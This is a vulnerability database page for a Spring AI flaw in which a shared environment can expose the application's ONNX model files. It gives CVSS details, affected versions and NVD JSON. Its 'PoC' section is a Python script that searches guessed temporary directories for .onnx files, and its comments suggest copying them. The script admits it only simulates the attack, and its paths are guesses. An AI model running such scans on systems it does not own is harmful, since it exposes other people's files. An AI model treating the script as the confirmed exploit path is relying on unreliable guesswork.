CVE-2026-40979

Description

In Spring AI, having access to a shared environment can expose the ONNX model used by the application. Affected versions: Spring AI: 1.0.0 - 1.0.5 (fixed in 1.0.6), 1.1.0 - 1.1.4 (fixed in 1.1.5)

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:* - VULNERABLE

Spring AI 1.0.0 - 1.0.5

Spring AI 1.1.0 - 1.1.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import os

# Proof of Concept for CVE-2026-40979
# This script simulates scanning for exposed ONNX models
# in a shared environment where Spring AI might store them.

def find_exposed_models():
    # Common directories where Spring AI might cache or store models
    search_paths = [
        "/tmp/spring-ai-onnx/",
        "/var/tmp/onnx_models/",
        "./models/"
    ]
    
    print("[*] Scanning for exposed ONNX models...")
    
    for base_path in search_paths:
        if os.path.exists(base_path):
            for root, dirs, files in os.walk(base_path):
                for file in files:
                    if file.endswith(".onnx"):
                        full_path = os.path.join(root, file)
                        print(f"[+] Found exposed model: {full_path}")
                        # In a real exploit, the attacker would copy or read this file
                        # with open(full_path, 'rb') as f:
                        #     data = f.read()
                        #     print(f"    - Size: {len(data)} bytes")

if __name__ == "__main__":
    find_exposed_models()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40979
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40979
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40979/
[4] VulDB https://vuldb.com/cve/CVE-2026-40979
[5] https://spring.io/security/cve-2026-40979

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40979", "sourceIdentifier": "[email protected]", "published": "2026-04-28T09:16:16.767", "lastModified": "2026-04-29T18:16:16.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Spring AI, having access to a shared environment can expose the ONNX model used by the application.\n\nAffected versions:\nSpring AI: 1.0.0 - 1.0.5 (fixed in 1.0.6), 1.1.0 - 1.1.4 (fixed in 1.1.5)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-377"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.0.6", "matchCriteriaId": "1CD6DC44-CDE8-47E4-A788-6D8AE716396F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.1.0", "versionEndExcluding": "1.1.5", "matchCriteriaId": "5013645B-3914-4A40-8D42-CB47344963A7"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-40979", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}